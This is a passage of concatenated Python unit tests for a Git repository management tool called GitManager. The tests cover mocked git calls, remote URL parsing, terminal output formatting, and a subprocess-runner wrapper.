run_gitrun.assert_called_with('rev-parse', '--show-toplevel',
cwd='/path/to/repository')
# setup mocks so that the path exists and is toplevel
os_path_isdir.reset_mock()
os_path_isdir.return_value = True
run_gitrun.reset_mock()
run_gitrun.return_value.success = True
run_gitrun.return_value.stdout = unittest.mock.mock_open(
read_data="/path/to/repository\n".encode("utf-8"))()
self.assertTrue(repo.exists(),
'existence of a repository when not toplevel')
os_path_isdir.assert_called_with('/path/to/repository')
run_gitrun.assert_called_with('rev-parse', '--show-toplevel',
cwd='/path/to/repository')
@unittest.mock.patch('GitManager.utils.run.GitRun')
def test_ref_parse(self, run_gitrun: unittest.mock.Mock):
""" checks that ref_parse function works as intended """
# create a repository
repo = implementation.LocalRepository('/path/to/repository')
# set the return value
run_gitrun.return_value.stdout = unittest.mock.mock_open(
read_data="aaaaaa\n".encode("utf-8"))()
self.assertEqual(repo.ref_parse("master"), "aaaaaa", "parsing master "
"works properly")
run_gitrun.assert_called_with("rev-parse", "master",
cwd='/path/to/repository')
run_gitrun.return_value.wait.assert_called_with()
@unittest.mock.patch('GitManager.utils.run.GitRun')
def test_symbolic_ref(self, run_gitrun: unittest.mock.Mock):
""" checks that symbolic_ref properly works as intended """
# create a repository
repo = implementation.LocalRepository('/path/to/repository')
# set the return value
run_gitrun.return_value.stdout = unittest.mock.mock_open(
read_data="refs/heads/master\n".encode("utf-8"))()
self.assertEqual(repo.symbolic_ref("HEAD"), "refs/heads/master",
"parsing symbolic ref works properly")
run_gitrun.assert_called_with("symbolic-ref", "-q", "HEAD",
cwd='/path/to/repository')
run_gitrun.return_value.wait.assert_called_with()
@unittest.mock.patch('GitManager.utils.run.GitRun')
def test_upstream_ref(self, run_gitrun: unittest.mock.Mock):
""" checks that upstream_ref properly works as intended """
# create a repository
repo = implementation.LocalRepository('/path/to/repository')
# set the return value
run_gitrun.return_value.stdout = unittest.mock.mock_open(
read_data="origin/master\n".encode("utf-8"))()
self.assertEqual(repo.upstream_ref("refs/heads/master"),
"origin/master",
"parsing upstream ref works properly")
run_gitrun.assert_called_with("for-each-ref",
"--format=%(upstream:short)",
"refs/heads/master",
cwd='/path/to/repository')
run_gitrun.return_value.wait.assert_called_with()
@unittest.mock.patch('GitManager.utils.run.GitRun')
def test_gc(self, run_gitrun: unittest.mock.Mock):
""" checks that gc method makes an external call """
# create a repository
repo = implementation.LocalRepository('/path/to/repository')
# and make sure that the return value is True
run_gitrun.success = True
# assert that we can garbage collect
self.assertTrue(repo.gc(),
'running garbage collection on a repository')
# check that we called the fetch --all command properly
run_gitrun.assert_called_with('gc', cwd='/path/to/repository',
pipe_stderr=True, pipe_stdin=True,
pipe_stdout=True)
# reset the mock
run_gitrun.reset_mock()
run_gitrun.success = True
self.assertTrue(repo.gc('--aggresive'),
'running aggressive housekeeping on a repository')
# check that we called the fetch --all command properly
run_gitrun.assert_called_with('gc', '--aggresive',
cwd='/path/to/repository',
pipe_stderr=True, pipe_stdin=True,
pipe_stdout=True)
@unittest.mock.patch('GitManager.utils.run.GitRun')
def test_fetch(self, run_gitrun: unittest.mock.Mock):
""" checks that fetch method makes an external call """
# create a repository
repo = implementation.LocalRepository('/path/to/repository')
# and make sure that the return value is True
run_gitrun.success = True
# assert that we can fetch
self.assertTrue(repo.fetch(), 'fetching a repository')
# check that we called the fetch --all command properly
run_gitrun.assert_called_with('fetch', '--all', '--quiet',
cwd='/path/to/repository',
pipe_stderr=True, pipe_stdin=True,
pipe_stdout=True)
@unittest.mock.patch('GitManager.utils.run.GitRun')
def test_pull(self, run_gitrun: unittest.mock.Mock):
""" checks that pull method makes an external call """
# create a repository
repo = implementation.LocalRepository('/path/to/repository')
# and make sure that the return value is True
run_gitrun.success = True
# assert that we can pull
self.assertTrue(repo.pull(), 'pulling a repository')
# check that we called the pull command properly
run_gitrun.assert_called_with('pull', cwd='/path/to/repository',
pipe_stderr=True, pipe_stdin=True,
pipe_stdout=True)
@unittest.mock.patch('GitManager.utils.run.GitRun')
def test_push(self, run_gitrun: unittest.mock.Mock):
""" checks that push method makes an external call """
# create a repository
repo = implementation.LocalRepository('/path/to/repository')
# and make sure that the return value is True
run_gitrun.success = True
# assert that we can push
self.assertTrue(repo.push(), 'push a repository')
# check that we called the push command properly
run_gitrun.assert_called_with('push', cwd='/path/to/repository',
pipe_stderr=True, pipe_stdin=True,
pipe_stdout=True)
@unittest.mock.patch('GitManager.utils.run.GitRun')
def test_local_status(self, run_gitrun: unittest.mock.Mock):
""" checks that local_status method makes an external call """
# create a repository
repo = implementation.LocalRepository('/path/to/repository')
# mock the exists function
repo.exists = unittest.mock.MagicMock(return_value=False)
# local status and non-existence
self.assertEqual(repo.local_status(), None, "local_status of "
"non-existing "
"repository")
# reset the mock and change the return value to True
repo.exists.reset_mock()
repo.exists.return_value = True
# setup the return value of the git run
run_gitrun.return_value.stdout = unittest.mock.mock_open(
read_data="".encode("utf-8"))()
# check that the local_status did print correctly
self.assertEqual(repo.local_status(), "", "Reading status works "
"properly")
# check that we called the status command
run_gitrun.assert_called_with('status', '--porcelain',
cwd='/path/to/repository')
@unittest.mock.patch('GitManager.utils.run.GitRun')
@unittest.mock.patch(
'GitManager.repo.implementation.LocalRepository.ref_parse',
side_effect=["aaaaaa", "bbbbbb", "aaaaaa", "bbbbbb", "aaaaaa",
"bbbbbb", "aaaaaa", "bbbbbb", "aaaaaa", "bbbbbb"]
)
@unittest.mock.patch(
'GitManager.repo.implementation.LocalRepository.upstream_ref',
side_effect=["origin/master", "origin/master", "origin/master",
"origin/master", "origin/master"]
)
@unittest.mock.patch(
'GitManager.repo.implementation.LocalRepository.symbolic_ref',
side_effect=["refs/heads/master", "refs/heads/master",
"refs/heads/master", "refs/heads/master",
"refs/heads/master"]
)
@unittest.mock.patch(
'GitManager.repo.implementation.LocalRepository.exists'
)
def test_remote_status(self,
LocalRepository_exists: unittest.mock.Mock,
LocalRepository_symbolic_ref: unittest.mock.Mock,
LocalRepository_upstream_ref: unittest.mock.Mock,
LocalRepository_ref_parse: unittest.mock.Mock,
run_gitrun: unittest.mock.Mock):
""" Tests that the remote_status command works properly """
# create a repository
repo = implementation.LocalRepository('/path/to/repository')
# if we want to update, we should have called with 'remote' 'update'
run_gitrun.return_value.success = False
self.assertEqual(repo.remote_status(update=True), None)
run_gitrun.assert_called_with('remote', 'update',
cwd='/path/to/repository')
# reset all the mocks
LocalRepository_exists.reset_mock()
LocalRepository_symbolic_ref.reset_mock()
LocalRepository_upstream_ref.reset_mock()
LocalRepository_ref_parse.reset_mock()
run_gitrun.reset_mock()
run_gitrun.return_value.success = True
# merge base is aaaaaa (local)
LocalRepository_exists.return_value = False
self.assertEqual(repo.remote_status(), None)
# reset all the mocks
LocalRepository_exists.reset_mock()
LocalRepository_symbolic_ref.reset_mock()
LocalRepository_upstream_ref.reset_mock()
LocalRepository_ref_parse.reset_mock()
run_gitrun.reset_mock()
# merge base is local
LocalRepository_exists.return_value = True
run_gitrun.return_value.stdout = unittest.mock.mock_open(
read_data="aaaaaa\n".encode("utf-8"))()
self.assertEqual(repo.remote_status(update=False),
implementation.RemoteStatus.REMOTE_NEWER)
run_gitrun.assert_called_with("merge-base", "aaaaaa", "bbbbbb",
cwd="/path/to/repository")
# reset all the mocks
LocalRepository_exists.reset_mock()
LocalRepository_symbolic_ref.reset_mock()
LocalRepository_upstream_ref.reset_mock()
LocalRepository_ref_parse.reset_mock()
run_gitrun.reset_mock()
# merge base is local
LocalRepository_exists.return_value = True
run_gitrun.return_value.stdout = unittest.mock.mock_open(
read_data="bbbbbb\n".encode("utf-8"))()
self.assertEqual(repo.remote_status(),
implementation.RemoteStatus.LOCAL_NEWER)
run_gitrun.assert_called_with("merge-base", "aaaaaa", "bbbbbb",
cwd="/path/to/repository")
# reset all the mocks
LocalRepository_exists.reset_mock()
LocalRepository_symbolic_ref.reset_mock()
LocalRepository_upstream_ref.reset_mock()
LocalRepository_ref_parse.reset_mock()
run_gitrun.reset_mock()
# merge base is ????
LocalRepository_exists.return_value = True
run_gitrun.return_value.stdout = unittest.mock.mock_open(
read_data="cccccc\n".encode("utf-8"))()
self.assertEqual(repo.remote_status(update=False),
implementation.RemoteStatus.DIVERGENCE)
run_gitrun.assert_called_with("merge-base", "aaaaaa", "bbbbbb",
cwd="/path/to/repository")
# reset all the mocks
LocalRepository_exists.reset_mock()
LocalRepository_symbolic_ref.reset_mock()
LocalRepository_upstream_ref.reset_mock()
LocalRepository_ref_parse.reset_mock()
run_gitrun.reset_mock()
# both refs are equal
LocalRepository_ref_parse.side_effect = ["aaaaaa", "aaaaaa"]
LocalRepository_exists.return_value = True
run_gitrun.return_value.stdout = unittest.mock.mock_open(
read_data="aaaaaa\n".encode("utf-8"))()
self.assertEqual(repo.remote_status(update=False),
implementation.RemoteStatus.UP_TO_DATE)
run_gitrun.assert_called_with("merge-base", "aaaaaa", "aaaaaa",
cwd="/path/to/repository")
class TestRemoteRepository(unittest.TestCase):
""" Tests that implementation works properly """
def test_eq(self):
""" Checks that equality between RemoteRepositories works properly """
self.assertEqual(
implementation.RemoteRepository('git@github.com:hello/world.git'),
implementation.RemoteRepository('git@github.com:hello/world.git'),
'equality between two RemoteRepositories'
)
self.assertNotEqual(
implementation.RemoteRepository('git@github.com:hello/world.git'),
implementation.RemoteRepository(
'https://github.com/hello/world.git'),
'difference between two RemoteRepositories'
)
def test_url(self):
""" Tests that the URL property works as intended """
self.assertEqual(
implementation.RemoteRepository(
'git@github.com:hello/world.git').url,
'git@github.com:hello/world.git',
'URL of a simple repository'
)
self.assertEqual(
implementation.RemoteRepository(
'https://github.com/hello/world.git').url,
'https://github.com/hello/world.git',
'URL of a simple git repository'
)
def test_matches(self):
""" Tests that the matches() of a remoteRepository works properly """
repo = implementation.RemoteRepository(
'git@github.com:hello/world.git')
self.assertTrue(repo.matches('world'), 'matching by a simple name')
self.assertTrue(repo.matches('hello/world'), 'matching by path')
self.assertTrue(repo.matches('w*'), 'matching by simple pattern')
self.assertTrue(repo.matches('h*/w*'), 'matching by complex pattern')
self.assertTrue(repo.matches('github.com/hello'),
'matching at the beginning')
self.assertTrue(repo.matches('hello'), 'matching in the middle')
self.assertTrue(repo.matches('git@github.com:hello/world.git'),
'matching full url')
self.assertFalse(repo.matches('wirld'), 'not matching non-pattern')
self.assertFalse(repo.matches('hello/wirld'),
'not matching non-pattern')
self.assertFalse(repo.matches('*/wirld'), 'not matching non-pattern')
self.assertFalse(repo.matches('git@github.com:halo/world.git'),
'not matching full url')
def test_str(self):
""" Tests that the str() of a remoteRepository works properly """
self.assertEqual(
str(implementation.RemoteRepository(
'git@github.com:hello/world.git')),
'git@github.com:hello/world.git',
'str() of a simple repository'
)
self.assertEqual(
str(implementation.RemoteRepository(
'https://github.com/hello/world.git')),
'https://github.com/hello/world.git',
'str() of a simple git repository'
)
def test_repr(self):
""" Tests that the repr() of a remoteRepository works properly """
self.assertEqual(
repr(implementation.RemoteRepository(
'git@github.com:hello/world.git')),
'<RemoteRepository git@github.com:hello/world.git>',
'str() of a simple repository'
)
self.assertEqual(
repr(implementation.RemoteRepository(
'https://github.com/hello/world.git')),
'<RemoteRepository https://github.com/hello/world.git>',
'repr() of a simple git repository'
)
@unittest.mock.patch('GitManager.utils.run.GitRun')
def test_exists(self, run_gitrun: unittest.mock.Mock):
""" checks that exists method makes an external call """
run_gitrun.return_value.success = True
# checking for existence should make an external call
self.assertTrue(implementation.RemoteRepository(
'git@github.com:hello/world.git').exists(),
'successfully checks existence using an external call')
run_gitrun.assert_called_with('ls-remote', '--exit-code',
'git@github.com:hello/world.git')
@unittest.mock.patch('GitManager.utils.run.GitRun')
def test_clone(self, run_gitrun: unittest.mock.Mock):
""" checks that clone method makes an external call """
run_gitrun.return_value.success = True
remote = implementation.RemoteRepository(
'git@github.com:hello/world.git')
local = implementation.LocalRepository('/path/to/clone')
# checking for existence should make an external call
self.assertTrue(remote.clone(local), 'successfully clones a '
'repository')
run_gitrun.assert_called_with('clone',
'git@github.com:hello/world.git',
'/path/to/clone', pipe_stderr=True,
pipe_stdin=True, pipe_stdout=True)
def test_components(self):
""" Checks that the components method works properly"""
def assert_components(url, components):
return self.assertEqual(
implementation.RemoteRepository(url).components(), components)
# git@github.com url
g_h_w_c = ['github.com', 'hello', 'world']
assert_components('git@github.com:hello/world.git', g_h_w_c)
assert_components('git@github.com:hello/world', g_h_w_c)
assert_components('git@github.com:hello/world/', g_h_w_c)
assert_components('git@github.com:hello/world//', g_h_w_c)
assert_components('ssh://git@github.com/hello/world.git', g_h_w_c)
assert_components('ssh://git@github.com/hello/world', g_h_w_c)
assert_components('ssh://git@github.com/hello/world/', g_h_w_c)
assert_components('ssh://git@github.com/hello/world//', g_h_w_c)
# https://github.com/user/repo
assert_components('https://github.com/hello/world.git', g_h_w_c)
assert_components('https://github.com:hello/world', g_h_w_c)
assert_components('https://github.com:hello/world/', g_h_w_c)
assert_components('https://github.com:hello/world//', g_h_w_c)
# user@server.com url
s_c_u_r = ['server.com', 'user', 'repository']
assert_components('user@server.com:repository', s_c_u_r)
assert_components('user@server.com:repository/', s_c_u_r)
assert_components('user@server.com:repository//', s_c_u_r)
assert_components('user@server.com:repository.git', s_c_u_r)
assert_components('ssh://user@server.com/repository', s_c_u_r)
assert_components('ssh://user@server.com/repository/', s_c_u_r)
assert_components('ssh://user@server.com/repository//', s_c_u_r)
assert_components('ssh://user@server.com/repository.git', s_c_u_r)
def test_humanish_part(self):
""" Checks that the get_humanish_part method works properly"""
self.assertEqual(
implementation.RemoteRepository(
'git@github.com:hello/world.git').humanish_part(),
'world')
self.assertEqual(
implementation.RemoteRepository(
'git@github.com:hello/world').humanish_part(),
'world'
)
self.assertEqual(
implementation.RemoteRepository(
'git@github.com:hello/world/').humanish_part(),
'world'
)
self.assertEqual(
implementation.RemoteRepository(
'git@github.com:hello/world//').humanish_part(),
'world'
)
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.utils import format
class TestFormat(unittest.TestCase):
""" Tests that the Format() class works properly """
def test_init(self):
""" Tests that format can not be instantiated """
with self.assertRaises(TypeError):
format.Format()
def test_red(self):
""" Tests that the red method works properly """
self.assertEqual(format.Format.red("Hello"), "\033[91mHello\033[00m")
def test_yellow(self):
""" Tests that the yelloe method works properly """
self.assertEqual(format.Format.yellow("Hello"),
"\033[93mHello\033[00m")
def test_green(self):
""" Tests that the green method works properly """
self.assertEqual(format.Format.green("Hello"), "\033[92mHello\033[00m")
def test_cyan(self):
""" Tests that the cyan method works properly """
self.assertEqual(format.Format.cyan("Hello"), "\033[96mHello\033[00m")
@unittest.mock.patch.object(format.Format, 'short_rel_path')
@unittest.mock.patch('os.path.expanduser', return_value='/home/user')
def test_short_abs_path(self,
os_path_expanduser: unittest.mock.Mock,
format_short_rel_path: unittest.mock.Mock):
# length is too short
with self.assertRaises(ValueError):
format.Format.short_abs_path('hello/world', 3)
# must be an absolute path
with self.assertRaises(ValueError):
format.Format.short_abs_path('hello/world', 10)
# short path outside of $HOME
self.assertEqual(
format.Format.short_abs_path('/hello/world', 15),
'/hello/world', 'short path outside of $HOME is left as is'
)
format_short_rel_path.assert_not_called()
format_short_rel_path.reset_mock()
# short path inside of $HOME
self.assertEqual(
format.Format.short_abs_path('/home/user/hello/world', 100),
'/home/user/hello/world',
'short path inside of $HOME is left as is'
)
format_short_rel_path.assert_not_called()
format_short_rel_path.reset_mock()
# path to be shortened outside of $HOME
format_short_rel_path.return_value = 'hello/.../world'
self.assertEqual(
format.Format.short_abs_path('/hello/brave/world', 16),
'/hello/.../world', 'path to be shortened outside of $HOME'
)
format_short_rel_path.assert_called_with('hello/brave/world', 15)
format_short_rel_path.reset_mock()
# path to be shortened inside of $HOME
format_short_rel_path.return_value = 'hello/.../world'
self.assertEqual(
format.Format.short_abs_path('/home/user/hello/brave/world', 17),
'~/hello/.../world', 'path to be shortened inside of $HOME'
)
format_short_rel_path.assert_called_with('hello/brave/world', 15)
format_short_rel_path.reset_mock()
def test_short_rel_path(self):
""" Tests that the short_rel_path() method works properly """
# length is too short
with self.assertRaises(ValueError):
format.Format.short_rel_path('hello/world', 2)
# must be a relative path
with self.assertRaises(ValueError):
format.Format.short_rel_path('/hello/world', 10)
self.assertEqual(format.Format.short_rel_path('hello/world', 15),
'hello/world', 'short path is given as is')
self.assertEqual(
format.Format.short_rel_path('hello/a/b//../.././/world', 15),
'hello/world', 'convoluted path is cleaned up automatically')
self.assertEqual(
format.Format.short_rel_path('hello/brave/world', 15),
'hello/.../world', 'replacing middle of three-component path '
'properly'
)
self.assertEqual(
format.Format.short_rel_path('1234567890/1234/', 15),
'1234567890/1234', 'remove unneeded slash from the end')
self.assertEqual(
format.Format.short_rel_path('a/b/cc/ddd/eeeee', 15),
'a/b/.../eeeee', 'replacing long path properly'
)
self.assertEqual(
format.Format.short_rel_path('hello/oh/brave/new/world', 15),
'hello/.../world', 'replacing long path properly'
)
self.assertEqual(
format.Format.short_rel_path('aaaaaaaaaa/bbbbb', 15),
'...aaaaaa/bbbbb', 'shorten path from the start'
)
self.assertEqual(
format.Format.short_rel_path('bbbbb/aaaaaaaaaa', 15),
'bbbbb/aaaaaa...', 'shorten path from the start'
)
@unittest.mock.patch.object(format.Format, 'short_rel_path',
return_value='hello/world')
@unittest.mock.patch.object(format.Format, 'short_abs_path',
return_value='/hello/world')
def test_rel_path(self,
format_short_abs_path: unittest.mock.Mock,
format_short_rel_path: unittest.mock.Mock):
""" Tests that the short_path() method works properly """
# length is too short
with self.assertRaises(ValueError):
format.Format.short_path('hello/world', 5)
# format absolute path
self.assertEqual(format.Format.short_path('/hello/world', 15),
'/hello/world', 'shorten absolute path')
format_short_abs_path.assert_called_with('/hello/world', 15)
format_short_abs_path.reset_mock()
format_short_rel_path.assert_not_called()
format_short_rel_path.reset_mock()
# format relative path
self.assertEqual(format.Format.short_path('hello/world', 15),
'hello/world', 'shorten relative path')
format_short_rel_path.assert_called_with('hello/world', 15)
format_short_rel_path.reset_mock()
format_short_abs_path.assert_not_called()
format_short_abs_path.reset_mock()
class TestTerminalLine(unittest.TestCase):
""" Tests that the TerminalLine() class works properly"""
@unittest.mock.patch('shutil.get_terminal_size')
def test_width(self, shutil_get_terminal_size: unittest.mock.Mock):
""" Tests that format.width works properly """
shutil_get_terminal_size.return_value.columns = 20
self.assertEqual(format.TerminalLine().width, 20, "width of a "
"TerminalLine")
shutil_get_terminal_size.assert_called_with()
@unittest.mock.patch.object(format.TerminalLine, 'width', 20)
@unittest.mock.patch.object(format.TerminalLine, 'append')
@unittest.mock.patch('sys.stdout.isatty')
def test_clean(self,
sys_stdout_isatty: unittest.mock.Mock,
format_terminal_line_append: unittest.mock.Mock):
""" Tests that format.clean works properly """
# resetting on a tty
sys_stdout_isatty.return_value = True
format.TerminalLine().clean()
format_terminal_line_append.assert_called_with(
'\r \r')
# reset all the things
sys_stdout_isatty.reset_mock()
format_terminal_line_append.reset_mock()
# resetting on a non tty
sys_stdout_isatty.return_value = False
line = format.TerminalLine()
line.clean()
format_terminal_line_append.assert_not_called()
self.assertEqual(line._TerminalLine__cache, '')
@unittest.mock.patch.object(format.TerminalLine, 'append')
def test_linebreak(self,
format_terminal_line_append: unittest.mock.Mock):
""" Tests that format.linebreak works correctly"""
tl = format.TerminalLine()
tl.linebreak()
format_terminal_line_append.assert_called_with(
'\n')
@unittest.mock.patch.object(format.TerminalLine, 'clean')
@unittest.mock.patch.object(format.TerminalLine, 'append')
def test_write(self,
format_terminal_line_append: unittest.mock.Mock,
format_terminal_line_clean: unittest.mock.Mock):
""" Tests that format.write works properly """
format.TerminalLine().write('Hello world')
format_terminal_line_clean.assert_called_with()
format_terminal_line_append.assert_called_with('Hello world')
@unittest.mock.patch('sys.stdout')
@unittest.mock.patch.object(format.TerminalLine, 'flush')
def test_append(self,
TerminalLine_flush: unittest.mock.Mock,
sys_stdout: unittest.mock.Mock):
""" Tests that format.append works properly """
# appending on a tty
sys_stdout.isatty.return_value = True
# make a terminal line and write hello world
tl = format.TerminalLine()
tl.append('Hello world')
sys_stdout.write.assert_called_with('Hello world')
TerminalLine_flush.assert_called_with()
self.assertEqual(tl._TerminalLine__cache, "")
# reset all the mocks
TerminalLine_flush.reset_mock()
sys_stdout.reset_mock()
# appending on a non-tty
sys_stdout.isatty.return_value = False
# make a terminal line and write hello world
tl = format.TerminalLine()
tl.append('Hello world')
sys_stdout.write.assert_not_called()
TerminalLine_flush.assert_called_with()
self.assertEqual(tl._TerminalLine__cache, "Hello world")
# reset all the mocks
TerminalLine_flush.reset_mock()
sys_stdout.reset_mock()
@unittest.mock.patch('sys.stdout')
def test_flush(self, sys_stdout: unittest.mock.Mock):
# appending on a tty
sys_stdout.isatty.return_value = True
# make a terminal line and write hello world
tl = format.TerminalLine()
tl._TerminalLine__cache = "Hello\nWorld"
tl.flush()
sys_stdout.write.assert_not_called()
sys_stdout.flush.assert_called_with()
# reset all the mocks
sys_stdout.reset_mock()
# appending on a non-tty
sys_stdout.isatty.return_value = False
# make a terminal line and write hello world
tl = format.TerminalLine()
tl._TerminalLine__cache = "Hello\nWorld"
tl.flush()
sys_stdout.write.assert_called_with("Hello\n")
sys_stdout.flush.assert_called_with()
self.assertEqual(tl._TerminalLine__cache, "World")
--- FILE SEPARATOR ---
import unittest
import unittest.mock
import subprocess
from GitManager.utils import run
class TestRun(unittest.TestCase):
@unittest.mock.patch('os.getcwd', return_value='/')
@unittest.mock.patch('os.environ.copy', return_value={})
def test_init(self, os_environ_copy: unittest.mock.Mock,
os_getcwd_mock: unittest.mock.Mock):
""" Tests that run instances are created properly """
# almost everything is default
run1 = run.ProcessRun("echo", "Hello world")
os_environ_copy.assert_called_once_with()
os_getcwd_mock.assert_called_once_with()
self.assertEqual(run1.exe, 'echo')
self.assertEqual(run1.args, ['Hello world'])
self.assertEqual(run1.cwd, '/')
self.assertEqual(run1.environment, {})
self.assertEqual(run1.pipe_stdout, False)
self.assertEqual(run1.pipe_stderr, False)
self.assertEqual(run1.pipe_stdin, False)
# and reset the mocks please
os_environ_copy.reset_mock()
os_getcwd_mock.reset_mock()
# use some non-default values
run2 = run.ProcessRun("echo", "Hello world", cwd='/hello',
pipe_stdout=True, environment={'hello': 'world'})
os_environ_copy.assert_not_called()
os_getcwd_mock.assert_not_called()
self.assertEqual(run2.exe, 'echo')
self.assertEqual(run2.args, ['Hello world'])
self.assertEqual(run2.cwd, '/hello')
self.assertEqual(run2.environment, {'hello': 'world'})
self.assertEqual(run2.pipe_stdout, True)
self.assertEqual(run2.pipe_stderr, False)
self.assertEqual(run2.pipe_stdin, False)
@unittest.mock.patch('subprocess.Popen')
@unittest.mock.patch('os.getcwd', return_value='/')
@unittest.mock.patch('os.environ.copy', return_value={})
def test_stdout(self, os_environ_copy: unittest.mock.Mock,
os_getcwd_mock: unittest.mock.Mock,
subprocess_popen: unittest.mock.Mock):
""" Tests that stdout works properly"""
# fake the return value of stdout
subprocess_popen.return_value.stdout = ''
# create a run where we do not pipe stdout
run1 = run.ProcessRun("echo", pipe_stdout=False)
# in the ready state we should raise an error
with self.assertRaises(run.ProcessRunStateError):
run1.stdout
# once we run, we should return the normal value
run1.run()
self.assertEqual(run1.stdout, '')
# create a run where we do pipe stdout
run2 = run.ProcessRun("echo", pipe_stdout=True)
# in the ready state we should raise an error
with self.assertRaises(run.ProcessRunStateError):
run2.stdout
# once we run, we should return None (because piping)
run2.run()
self.assertEqual(run2.stdout, None)
@unittest.mock.patch('subprocess.Popen')
@unittest.mock.patch('os.getcwd', return_value='/')
@unittest.mock.patch('os.environ.copy', return_value={})
def test_stderr(self, os_environ_copy: unittest.mock.Mock,
os_getcwd_mock: unittest.mock.Mock,
subprocess_popen: unittest.mock.Mock):
""" Tests that stderr works properly"""
# fake the return value of stderr
subprocess_popen.return_value.stderr = ''
# create a run where we do not pipe stderr
run1 = run.ProcessRun("echo", pipe_stderr=False)
# in the ready state we should raise an error
with self.assertRaises(run.ProcessRunStateError):
run1.stderr
# once we run, we should return the normal value
run1.run()
self.assertEqual(run1.stderr, '')
# create a run where we do pipe stderr
run2 = run.ProcessRun("echo", pipe_stderr=True)
# in the ready state we should raise an error
with self.assertRaises(run.ProcessRunStateError):
run2.stderr
# once we run, we should return None (because piping)
run2.run()
self.assertEqual(run2.stderr, None)
@unittest.mock.patch('subprocess.Popen')
@unittest.mock.patch('os.getcwd', return_value='/')
@unittest.mock.patch('os.environ.copy', return_value={})
def test_stdin(self, os_environ_copy: unittest.mock.Mock,
os_getcwd_mock: unittest.mock.Mock,
subprocess_popen: unittest.mock.Mock):
""" Tests that stdin works properly"""
# fake the return value of stdin
subprocess_popen.return_value.stdin = ''
# create a run where we do not pipe stdin
run1 = run.ProcessRun("echo", pipe_stdin=False)
# in the ready state we should raise an error
with self.assertRaises(run.ProcessRunStateError):
run1.stdin
# once we run, we should return the normal value
run1.run()
self.assertEqual(run1.stdin, '')
# create a run where we do pipe stdin
run2 = run.ProcessRun("echo", pipe_stdin=True)
# in the ready state we should raise an error
with self.assertRaises(run.ProcessRunStateError):
run2.stdin
# once we run, we should return None (because piping)
run2.run()
self.assertEqual(run2.stdin, None)
@unittest.mock.patch('subprocess.Popen')
@unittest.mock.patch('os.getcwd', return_value='/')
@unittest.mock.patch('os.environ.copy', return_value={})
def test_state(self, os_environ_copy: unittest.mock.Mock,
os_getcwd_mock: unittest.mock.Mock,
subprocess_popen: unittest.mock.Mock):
""" Tests that state calls work properly """
# create a new run instance
run1 = run.ProcessRun("echo")
# should start out with the ready() state
self.assertEqual(run1.state, run.ProcessRunState.NEW)
# we now run it and return None
run1.run()
subprocess_popen.return_value.returncode = None
# which means we are always alive
self.assertEqual(run1.state, run.ProcessRunState.ACTIVE)
# once we have a return code we are finished
subprocess_popen.return_value.returncode = 0
self.assertEqual(run1.state, run.ProcessRunState.TERMINATED)
@unittest.mock.patch('subprocess.Popen')
@unittest.mock.patch('os.getcwd', return_value='/')
@unittest.mock.patch('os.environ.copy', return_value={})
def test_run(self, os_environ_copy: unittest.mock.Mock,
os_getcwd_mock: unittest.mock.Mock,
subprocess_popen: unittest.mock.Mock):
""" tests that run() calls work properly """
# make a (fairly default) run
run1 = run.ProcessRun("echo")
# run the process -- it should make a call to subprocess.Popen
run1.run()
subprocess_popen.assert_called_with(['echo'], cwd='/',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE, env={})
# and if you try to run it again, it should raise an error
with self.assertRaises(run.ProcessRunStateError):
run1.run()
# reset the mock
subprocess_popen.reset_mock()
# make a (non-default) run
run2 = run.ProcessRun("echo", "Hello world", pipe_stdout=True,
pipe_stderr=True, pipe_stdin=True,
cwd='/hello', environment={'hello': 'world'})
# run the process -- it should make a call to subprocess.Popen
run2.run()
subprocess_popen.assert_called_with(['echo', 'Hello world'],
cwd='/hello',
stdout=None,
stderr=None,
stdin=None, env={'hello': 'world'})
# and if you try to run it again, it should raise an error
with self.assertRaises(run.ProcessRunStateError):
run2.run()
@unittest.mock.patch('subprocess.Popen')
@unittest.mock.patch('os.getcwd', return_value='/')
@unittest.mock.patch('os.environ.copy', return_value={})
def test_wait(self, os_environ_copy: unittest.mock.Mock,
os_getcwd_mock: unittest.mock.Mock,
subprocess_popen: unittest.mock.Mock):
""" Makes sure that the wait call works properly"""
# make a new run and wait for the default amount of time
run1 = run.ProcessRun("echo")
run1.wait()
# wait() should have been called with None
subprocess_popen.assert_called_with(['echo'], cwd='/',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE, env={})
subprocess_popen.return_value.wait.assert_called_with(timeout=None)
subprocess_popen.reset_mock()
# make a new run and wait for a fixed amount of time
run2 = run.ProcessRun("echo")
run2.wait(100)
# wait should have been called with Some()
subprocess_popen.assert_called_with(['echo'], cwd='/',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE, env={})
subprocess_popen.return_value.wait.assert_called_with(timeout=100)
# this time run manually and pretend it is rzunning
run3 = run.ProcessRun("echo")
run3.run()
subprocess_popen.return_value.returncode = None
# reset all the call counters
subprocess_popen.reset_mock()
# and now we should wait for 100
run3.wait(100)
subprocess_popen.assert_not_called()
subprocess_popen.return_value.wait.assert_called_with(timeout=100)
@unittest.mock.patch('subprocess.Popen')
@unittest.mock.patch('os.getcwd', return_value='/')
@unittest.mock.patch('os.environ.copy', return_value={})
def test_kill(self, os_environ_copy: unittest.mock.Mock,
os_getcwd_mock: unittest.mock.Mock,
subprocess_popen: unittest.mock.Mock):
""" tests that killing works properly"""
# make a new run and wait for the default amount of time
run1 = run.ProcessRun("echo")
# we can not kill it if it is not running.
with self.assertRaises(run.ProcessRunStateError):
run1.kill()
# run the process and properly pretend that it is alive
run1.run()
subprocess_popen.return_value.returncode = None
# now we can kill
run1.kill()
subprocess_popen.return_value.kill.assert_called_with()
# pretend we have finished
subprocess_popen.return_value.returncode = 1
# we should not be able to kill anymore
with self.assertRaises(run.ProcessRunStateError):
run1.kill()
@unittest.mock.patch('subprocess.Popen')
@unittest.mock.patch('os.getcwd', return_value='/')
@unittest.mock.patch('os.environ.copy', return_value={})
def test_returncode(self, os_environ_copy: unittest.mock.Mock,
os_getcwd_mock: unittest.mock.Mock,
subprocess_popen: unittest.mock.Mock):
""" Tests that the returncode attribute works properly """
# make a new run and wait for the default amount of time
run1 = run.ProcessRun("echo")
# mock the returncode of the call
subprocess_popen.return_value.returncode = 0
self.assertEqual(run1.returncode, 0)
# we should have called the subprocess
subprocess_popen.assert_called_with(['echo'], cwd='/',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE, env={})
# and a wait call
